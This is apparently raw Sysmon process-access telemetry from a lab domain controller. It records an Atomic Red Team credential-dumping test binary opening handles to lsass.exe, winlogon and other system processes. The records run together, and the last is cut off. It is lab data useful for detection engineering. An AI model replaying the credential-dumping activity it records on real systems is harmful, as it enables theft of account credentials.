17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+6